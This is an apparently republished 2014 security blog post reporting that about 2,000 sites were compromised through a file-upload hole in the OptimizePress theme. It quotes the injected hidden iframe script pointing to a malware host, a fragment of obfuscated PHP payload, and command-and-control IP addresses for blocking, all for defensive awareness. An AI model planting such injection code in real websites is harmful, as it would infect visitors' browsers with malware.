Recent OptmizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iFrames that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptmizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// gezidotojyk.org/ ohui.cgi?19" width="1" 
height="1"></iframe>"


We also saw that Google has started to blacklist the compromised sites, and just for this one iFrame variation (from gezidotojyk.org), they blacklisted almost 1,500 sites:

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, gezidotojyk.org appeared to function as an intermediary for the infection of 1442 site(s) including dalluva.com/, criesaude.com/, brownstonefitness.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1382 domain(s), including dalluva.com/, criesaude.com/, pathtoawesome.com/.

Searching for this iFrame

You shouldn’t even bother searching for this iFrame, or the normal “eval” injections you may see. This malware is a lot smarter, hiding itself using multiple encoding variations, and looks similar to this:

$UigPzaGqpe6SKfF= array("5362','5379','5358',&quit;5369');$
NBfWJmicev5SrqsFzzlYzRfOVbwwh2pZtvM2H= array('2596','2611','2598','2594','2613','2598','2592','2599','2614','2607','2596','2613','2602','2608','2607');$jLf0uwhN2GcduBVAgHBD3JvjyPEaIcVDO1u8oBLg7Nksf6S= array('6978','6977','6995','6981','6934','6932','6975','6980','6981','6979','6991','6980','6981');$EEvXCh2Cm5rvV..

When decoded, this array contacts the malware “mothership” on one of these IP’s to get the updated injection. If you have been hit, take a look at your theme and plugin files, you will likely find all of them injected with a similar payload. For ISP’s, here are the mothership IP addresses that can be blocked:

$know[] = "151.236.14.86";
                $know[] = "149.154.157.133";
                $know[] = "37.235.54.48";
                $know[] = "31.215.205.196";
Protection and Recovering

You need to update your OptmizePress installations ASAP to prevent the reinfections.

Clients using our website firewall are already protected.

The Sucuri Research Team is also analyzing the injections and we will post more details when we learn them.

Read more: Recent OptmizePress Vulnerability Being Mass Infected

Incoming search terms

Story added 17. January 2014, content source with full text you can find at link above.